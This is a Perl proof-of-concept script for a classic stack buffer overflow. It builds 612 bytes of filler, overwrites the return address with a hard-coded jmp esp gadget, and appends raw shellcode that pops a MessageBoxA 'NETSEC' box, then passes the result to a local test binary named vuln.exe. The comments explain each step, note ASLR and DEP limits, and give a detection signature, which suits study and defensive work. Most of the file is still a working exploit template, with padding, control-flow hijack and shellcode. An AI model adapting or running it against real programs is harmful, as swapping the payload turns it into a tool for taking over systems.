#!/usr/bin/perl
# Stack-overflow proof-of-concept harness: builds one oversized argument
# (padding + overwritten return address + payload) and hands it to a local
# test binary, vuln.exe.  Everything below is a package global; the script
# has no `use strict; use warnings;`, so typos in these names would go
# unreported.  The payload is not executed by this script itself — it only
# becomes code if vuln.exe mishandles the argument.

#JMP ESP way
# 612 bytes of filler: the distance to the saved return address is hard-coded
# for one specific build of vuln.exe.
$buffer = "A" x 612;

# Overwrites the saved return address with an absolute, little-endian
# address of a `jmp esp` gadget (ff e4), per the author's note.  Because the
# address is fixed, this only works if the containing module loads at the
# same base every time — ASLR (or simply a different library build) makes it
# land elsewhere, and DEP/NX prevents the stack bytes from executing at all.
$eip = "\xed\x1e\x93\x7c"; ## -->jmp esp ff e4: 7c931eed";

# Payload bytes.  The four-byte groups split onto their own lines
# (\x77\x1d\x80\x7c, \x28\xac\x80\x7c and \xa2\xca\x81\x7c further down)
# look like more hard-coded absolute addresses — presumably library
# functions the payload calls; the exact targets cannot be confirmed from
# this file.  The trailing ASCII bytes spell "user32.dll", "MessageBoxA" and
# "NETSEC", so the observable effect of a successful run is a message box —
# a benign demonstration rather than a remote-access payload.
$shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb".
             "\x77\x1d\x80\x7c".
             "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb".
             "\x28\xac\x80\x7c".
             "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51".
             "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff".
             "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff".  # "user32.dll"
             "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff".  # "MessageBoxA"
             "\xff\x4e\x45\x54\x53\x45\x43\x4e";                                        # "NETSEC"

# Final argument: filler, then the overwritten return address, then payload.
$total = $buffer.$eip.$shellcode;

# List-form exec, so no shell is involved and the bytes reach vuln.exe as a
# single argv entry unchanged.  Quoting "$total" is redundant; the string is
# passed as-is either way.  On success exec never returns, so exit() is only
# reached if vuln.exe could not be started — and that failure is silently
# discarded (no `or die "exec vuln.exe: $!"`), which makes a missing or
# non-executable binary indistinguishable from a run that did nothing.
# From a defensive viewpoint the observable signature is a process launched
# with a ~700-byte argv[1] consisting of a long run of 0x41 followed by
# non-printable bytes.
exec("vuln.exe", "$total");
exit();